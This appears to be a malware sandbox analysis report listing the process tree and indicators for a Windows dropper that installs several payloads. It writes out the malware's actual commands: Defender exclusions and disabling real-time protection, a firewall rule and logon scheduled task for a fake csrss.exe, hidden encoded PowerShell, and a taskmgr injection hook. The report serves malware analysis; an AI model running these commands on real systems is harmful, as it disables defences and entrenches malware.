Token: SeDebugPrivilege	540	cmd.exe
Token: SeImpersonatePrivilege	540	cmd.exe
Token: SeSystemEnvironmentPrivilege	2156	csrss.exe
Token: SeDebugPrivilege	1988	powershell.EXE
Token: SeDebugPrivilege	452	powershell.EXE
Token: SeSecurityPrivilege	700	conhost.exe
Token: SeSecurityPrivilege	700	conhost.exe
Token: SeDebugPrivilege	3056	conhost.exe
Token: SeDebugPrivilege	1672	powershell.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
700	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 700 wrote to memory of 2024	700	conhost.exe	186
PID 700 wrote to memory of 2024	700	conhost.exe	186
PID 700 wrote to memory of 2024	700	conhost.exe	186
PID 700 wrote to memory of 2024	700	conhost.exe	186
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 700 wrote to memory of 1800	700	conhost.exe	30
PID 1800 wrote to memory of 540	1800	CasPol.exe	226
PID 1800 wrote to memory of 540	1800	CasPol.exe	226
PID 1800 wrote to memory of 540	1800	CasPol.exe	226
PID 1800 wrote to memory of 540	1800	CasPol.exe	226
PID 1800 wrote to memory of 544	1800	CasPol.exe	270
PID 1800 wrote to memory of 544	1800	CasPol.exe	270
PID 1800 wrote to memory of 544	1800	CasPol.exe	270
PID 1800 wrote to memory of 544	1800	CasPol.exe	270
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 1872	1800	CasPol.exe	34
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2956	1800	CasPol.exe	71
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 1800 wrote to memory of 2340	1800	CasPol.exe	39
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2340 wrote to memory of 700	2340	Fku5AId0LuZ4E8yzod75BtEi.exe	272
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 2956 wrote to memory of 2960	2956	Btpmb8l6OLnsIVBHYXzcfv46.exe	41
PID 1520 wrote to memory of 1256	1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe	47
PID 1520 wrote to memory of 1256	1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe	47
PID 1520 wrote to memory of 1256	1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe	47
PID 1520 wrote to memory of 1256	1520	Ahzn2Szwr26hfrPXyZRPFZkG.exe	47
PID 1256 wrote to memory of 2844	1256	cmd.exe	43
PID 1256 wrote to memory of 2844	1256	cmd.exe	43
PID 1256 wrote to memory of 2844	1256	cmd.exe	43
PID 884 wrote to memory of 2840	884	lhuGc8cD8YBgMslw3CZs4Nqs.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe
"C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"
1⤵
- Windows security bypass
- Windows security modification
PID:700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe" -Force
  2⤵
  PID:2024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe
    "C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1872
- - C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe
    "C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"
    3⤵
    PID:544
  - - C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe
      "C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2840
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2616
- - C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe
    "C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp" /SL5="$C011C,831488,831488,C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT
      4⤵
      PID:700
- - C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe
    "C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe"
    3⤵
    - Executes dropped EXE
    PID:1852
- - C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe
    "C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2956
- - C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe
    "C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1296
- - C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe
    "C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    - Executes dropped EXE
    PID:1716

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204034220.log C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab
1⤵
PID:1764

C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe
"C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"
1⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1256
- C:\Windows\rss\csrss.exe
  C:\Windows\rss\csrss.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Manipulates WinMonFS driver.
  - Drops file in Windows directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- - C:\Windows\system32\bcdedit.exe
    C:\Windows\Sysnative\bcdedit.exe /v
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:300
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
    3⤵
    - Creates scheduled task(s)
    PID:2392
- - C:\Windows\windefender.exe
    "C:\Windows\windefender.exe"
    3⤵
    - Executes dropped EXE
    PID:2848
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
      4⤵
      PID:1732

C:\Users\Admin\AppData\Local\Temp\7zS3DCB.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960
- C:\Users\Admin\AppData\Local\Temp\7zS4598.tmp\Install.exe
  .\Install.exe /mGaXdidI "385118" /S
  2⤵
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks for any installed AV software in registry
  - Drops file in System32 directory
  - Enumerates system info in registry
  PID:2556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gheXiYzEa" /SC once /ST 02:18:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gheXiYzEa"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gheXiYzEa"
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe\" cj /jtsite_idcNK 385118 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2580

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2844

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:2900
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  2⤵
  PID:1968
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  2⤵
  PID:3020

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
1⤵
PID:1056
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2072
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:2112

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
1⤵
- Creates scheduled task(s)
PID:2772

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1628

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
1⤵
PID:348

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
1⤵
PID:2768

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
1⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2596

C:\Windows\system32\taskeng.exe
taskeng.exe {2DF579F3-DC69-48EC-9E03-60B99B134EC0} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
1⤵
PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:452
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:3056
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:1672
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1272

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2380

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:3020

C:\Windows\system32\taskeng.exe
taskeng.exe {3565A2E0-9A18-4148-AC3A-1D876DF201BF} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3064
- C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe
  C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe cj /jtsite_idcNK 385118 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gRVicEdMr" /SC once /ST 00:53:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1136
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gRVicEdMr"
    3⤵
    PID:496
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gRVicEdMr"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gizzjgiJB" /SC once /ST 00:47:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gizzjgiJB"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1444
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:1624
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gizzjgiJB"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\RZfGRCgJsrDIEOco\gOvGNKio\bEiwlcTrlGCrRBtN.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1660
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1876
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2236
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2616
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2344
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:332
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1136
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2880
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:472
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2004
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\JZwkkdJX\nHMdFzJ.dll",#1 /GXsite_idqnL 385118
        5⤵
        Blocklisted process makes network request
        Checks BIOS information in registry
        Loads dropped DLL
        Drops file in System32 directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        
        PID:2900
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
        6⤵
        
        PID:1328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2688
  - - C:\Windows\SysWOW64\reg.exe
